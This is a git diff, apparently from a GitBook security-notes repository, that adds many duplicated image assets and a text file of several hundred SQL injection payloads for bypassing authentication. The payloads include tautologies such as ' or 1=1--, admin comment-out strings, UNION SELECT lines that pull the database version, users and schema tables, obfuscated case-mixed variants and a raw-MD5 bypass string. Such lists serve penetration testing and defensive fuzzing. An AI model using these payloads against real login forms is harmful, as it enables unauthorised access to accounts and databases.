diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (1).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (1).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (10).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (10).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (10).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (11).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (11).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (11).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (12).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (12).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (12).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (13).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (13).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (13).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (14).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (14).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (14).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (2).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (2).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (3).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (3).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (4).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (4).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (5).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (5).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (6).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (6).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (7).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (7).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (7).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (8).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (8).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (8).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (9).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (9).png new file mode 100644 index 000000000..4c4968b48 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2) (1) (9).png differ diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png new file mode 100644 index 000000000..5c4892619 Binary files /dev/null and b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png new file mode 100644 index 000000000..007459da8 Binary files /dev/null and b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (1).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (1).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (2).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (2).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (3).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (3).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (4).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (4).png new file mode 100644 index 000000000..b2fe24f43 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png new file mode 100644 index 000000000..a8a225c86 Binary files /dev/null and b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (1).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (1).png new file mode 100644 index 000000000..fa1f7424c Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (2).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (2).png new file mode 100644 index 000000000..fa1f7424c Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (1).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (1).png new file mode 100644 index 000000000..574ff118e Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (2).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (2).png new file mode 100644 index 000000000..574ff118e Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (2).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (2).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (3).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (3).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png new file mode 100644 index 000000000..98efc7f5c Binary files /dev/null and b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (621) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (621) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..e2fc218f9 Binary files /dev/null and b/.gitbook/assets/image (621) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (642) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-long (1) (1) (1).txt b/.gitbook/assets/sqli-authbypass-long (1) (1) (1).txt new file mode 100644 index 000000000..5a03da57f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-long (1) (1) (1).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" 